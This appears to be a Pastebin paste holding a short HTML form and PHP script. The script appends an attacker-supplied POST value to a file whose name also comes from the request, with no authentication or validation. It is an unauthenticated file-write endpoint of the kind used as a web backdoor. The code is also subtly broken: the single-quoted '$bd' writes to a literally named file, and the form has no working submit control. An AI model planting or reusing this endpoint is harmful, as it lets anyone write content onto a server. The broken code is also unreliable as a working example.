Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <form method=post>
- <input type=hidden name=dud>
- <input type=hidden name=bd>
- <input type=hidden value=submit>
- </form>
- <?php
- $dud = $_POST['dud'];
- $bd = $_POST['bd'];
- $fh = fopen('$bd', 'a');
- fwrite($fh,$dud);
- fclose($fh);
- ?>
Advertisement
Add Comment
Please, Sign In to add comment